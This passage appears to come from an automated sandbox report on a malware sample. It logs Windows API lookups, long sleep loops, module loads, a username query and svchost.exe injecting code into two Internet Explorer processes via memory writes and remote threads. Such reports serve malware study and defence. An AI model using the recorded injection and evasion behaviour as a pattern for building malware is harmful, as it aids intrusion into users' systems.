| Get Address | - | function = GetCurrentProcessId, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetCurrentThreadId, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = InitializeSListHead, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetCurrentProcess, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = TerminateProcess, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = WideCharToMultiByte, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = EncodePointer, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = DecodePointer, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = MultiByteToWideChar, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = SetLastError, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = InitializeCriticalSectionAndSpinCount, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = TlsAlloc, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = TlsGetValue, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = TlsSetValue, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = TlsFree, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = LCMapStringW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetLocaleInfoW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetStringTypeW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetCPInfo, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetLastError, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = FreeLibrary, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = LoadLibraryExW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = RaiseException, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = InterlockedFlushSList, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = RtlUnwind, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = ExitProcess, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetModuleHandleExW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetModuleFileNameA, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = HeapAlloc, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = HeapReAlloc, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = HeapFree, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetACP, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetStdHandle, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetFileType, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = IsValidLocale, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetUserDefaultLCID, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = EnumSystemLocalesW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = FindClose, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = FindFirstFileExA, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = FindNextFileA, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = IsValidCodePage, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetOEMCP, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetCommandLineA, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetCommandLineW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetEnvironmentStringsW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = FreeEnvironmentStringsW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetProcessHeap, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = FlushFileBuffers, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = WriteFile, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetConsoleCP, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetConsoleMode, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = ReadFile, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = SetFilePointerEx, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = SetStdHandle, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = HeapSize, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = WriteConsoleW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = ReadConsoleW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = CreateFileW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77389981 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x76b418be |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x773545a5 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76b61f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x76b63879 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitOnceExecuteOnce, address_out = 0x76b59601 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x76b124d8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreW, address_out = 0x76b4db8b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x76b42111 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x76b4b009 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x773589be |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7734c02a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7734c0d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x76b43f78 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77358bfb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7734b567 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77375998 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77342251 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x773428f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x76b99aa9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x76b4eb4e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleEx, address_out = 0x76b538ad |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandle, address_out = 0x76b48d0f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimePreciseAsFileTime, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WakeConditionVariable, address_out = 0x773d5a7b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSRWLock, address_out = 0x77389981 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x7738334e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TryAcquireSRWLockExclusive, address_out = 0x77361801 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77383324 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SleepConditionVariableSRW, address_out = 0x76b423f5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWork, address_out = 0x76b489f2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SubmitThreadpoolWork, address_out = 0x773426a9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWork, address_out = 0x77342111 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x76b6ebc6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x76b453a5 |
|
1 | |
| Get Address | c:\windows\system32\psapi.dll | function = GetModuleFileNameExA, address_out = 0x759d15bc |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x77376048 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlCreateUserThread, address_out = 0x77339250 |
|
2 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Username | user_name_out = 2XC7u663GxWc |
|
1 |
System (5764)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1114 | |
| Sleep | duration = 2000 milliseconds (2.000 seconds) |
|
2 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
3268 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
31 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
223 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:17 (UTC) |
|
4 | |
| Get Time | type = Performance Ctr, time = 26213509034 |
|
1 | |
| Get Time | type = Ticks, time = 11035619 |
|
1 | |
| Get Time | type = Performance Ctr, time = 26221877920 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:27 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:37 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:47 (UTC) |
|
18 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:48 (UTC) |
|
58 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:49 (UTC) |
|
64 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:50 (UTC) |
|
58 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:51 (UTC) |
|
13 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:54 (UTC) |
|
32 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:55 (UTC) |
|
54 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:56 (UTC) |
|
5 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:58 (UTC) |
|
25 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:59 (UTC) |
|
58 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:00 (UTC) |
|
58 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:01 (UTC) |
|
50 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:02 (UTC) |
|
58 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:03 (UTC) |
|
62 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:04 (UTC) |
|
49 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:05 (UTC) |
|
36 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:08 (UTC) |
|
53 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:09 (UTC) |
|
58 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:10 (UTC) |
|
59 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:11 (UTC) |
|
59 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:12 (UTC) |
|
59 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:13 (UTC) |
|
47 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:15 (UTC) |
|
20 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:16 (UTC) |
|
10 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:18 (UTC) |
|
18 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:19 (UTC) |
|
12 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:21 (UTC) |
|
17 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:22 (UTC) |
|
1 | |
| Get Info | type = Hardware Information |
|
4 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
2 |
Network Behavior
Process #36: iexplore.exe
123
0
| Information | Value |
|---|---|
| ID | #36 |
| File Name | c:\program files\internet explorer\iexplore.exe |
| Command Line | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:11, Reason: Injection |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc38 |
| Parent PID | 0xc0c (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B4C
0x
E38
0x
E00
0x
DF4
0x
CE8
0x
C7C
0x
C74
0x
C6C
0x
C68
0x
C64
0x
C60
0x
C58
0x
C50
0x
C4C
0x
C3C
0x
A30
0x
1CC
0x
BA8
0x
BBC
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #35: c:\windows\system32\svchost.exe | 0xa3c | address = 0x1a00000, size = 79360 |
|
1 | |
| Modify Memory | #35: c:\windows\system32\svchost.exe | 0xa3c | address = 0x1a13600, size = 32 |
|
1 | |
| Create Remote Thread | #35: c:\windows\system32\svchost.exe | 0xa3c | address = 0x1a13600 |
|
1 |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (116)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x771d0000 |
|
1 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
2 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x6c330000 |
|
2 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
4 | |
| Load | kernel32 | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x76b10000 |
|
2 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
2 | |
| Load | Ws2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x75610000 |
|
2 | |
| Get Handle | c:\windows\system32\ws2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Get Handle | c:\windows\system32\crypt32.dll | base_address = 0x75610000 |
|
1 | |
| Get Handle | c:\program files\internet explorer\iexplore.exe | base_address = 0xc50000 |
|
1 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\program files\internet explorer\iexplore.exe, file_name_orig = C:\Program Files\Internet Explorer\iexplore.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetExitCodeThread, address_out = 0x76b46ddd |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x76b5ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x76b5cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x7738cd10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteConsoleW, address_out = 0x76b582f1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76b6ed38 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76b63d01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x76b5cdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76b52331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76b676b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76b5bb9f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76b5cac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76b5bb80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76b62fde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSListHead, address_out = 0x77395eeb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStartupInfoW, address_out = 0x76b63891 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x76b6374d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedExchange, address_out = 0x76b5bf0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFree, address_out = 0x76b61da4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x76b62fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x76b6395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualProtectEx, address_out = 0x76b9f5d9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x76b633f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpiA, address_out = 0x76b52249 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x76b48c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpyA, address_out = 0x76b59793 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSize, address_out = 0x77389bec |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedFlushSList, address_out = 0x77383129 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RtlUnwind, address_out = 0x76b47f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x76b5bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x76b5bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77389ac5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsAlloc, address_out = 0x76b635a1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsGetValue, address_out = 0x76b5da70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsSetValue, address_out = 0x76b5da88 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsFree, address_out = 0x76b613b8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibrary, address_out = 0x76b5d9d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryExW, address_out = 0x76b54775 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RaiseException, address_out = 0x76b4eb60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x76b6214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleExW, address_out = 0x76b53e39 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76b6452b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringW, address_out = 0x76b613d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76b60e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileExA, address_out = 0x76b9f3ef |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x76b5a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidCodePage, address_out = 0x76b6c1c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetACP, address_out = 0x76b639aa |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOEMCP, address_out = 0x76b53db9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCPInfo, address_out = 0x76b61e2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x76b698ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineW, address_out = 0x76b6679e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x76b61dbc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x76b61dc3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStdHandle, address_out = 0x76b61e46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileType, address_out = 0x76b675a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStringTypeW, address_out = 0x76b667c8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetStdHandle, address_out = 0x76b9f589 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76b61400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76b47f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleCP, address_out = 0x76b62c8a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleMode, address_out = 0x76b62412 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointerEx, address_out = 0x76b4f5b2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAIoctl, address_out = 0x75a92fe7 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = PathFindFileNameA, address_out = 0x771e00aa |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrChrA, address_out = 0x771dc5e6 |
|
1 | |
| Get Address | c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll | function = InitializeCriticalSectionEx, address_out = 0x0 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x76b6418d |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x76b676e6 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76b61e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x76b9f72b |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = connect, address_out = 0x75a96bdd |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertGetCertificateChain, address_out = 0x75626ccf |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertVerifyCertificateChainPolicy, address_out = 0x7562cae2 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:33:19 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 26501802556 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #37: iexplore.exe
123
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\program files\internet explorer\iexplore.exe |
| Command Line | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3128 CREDAT:14337 |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:03:13, Reason: Injection |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc94 |
| Parent PID | 0xc38 (c:\program files\internet explorer\iexplore.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E3C
0x
E14
0x
E04
0x
DFC
0x
CE4
0x
CE0
0x
CDC
0x
CD8
0x
CD4
0x
CD0
0x
CCC
0x
CC8
0x
CB8
0x
CB4
0x
CAC
0x
CA8
0x
CA4
0x
C9C
0x
C98
0x
BCC
0x
37C
0x
BA4
0x
DE4
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #35: c:\windows\system32\svchost.exe | 0xa3c | address = 0x1a90000, size = 79360 |
|
1 | |
| Modify Memory | #35: c:\windows\system32\svchost.exe | 0xa3c | address = 0x1aa3600, size = 32 |
|
1 | |
| Create Remote Thread | #35: c:\windows\system32\svchost.exe | 0xa3c | address = 0x1aa3600 |
|
1 |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (116)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x771d0000 |
|
1 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
2 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x6c330000 |
|
2 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
4 | |
| Load | kernel32 | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x76b10000 |
|
2 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
2 | |
| Load | Ws2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x75610000 |
|
2 | |
| Get Handle | c:\windows\system32\ws2_32.dll | base_address = 0x75a90000 |
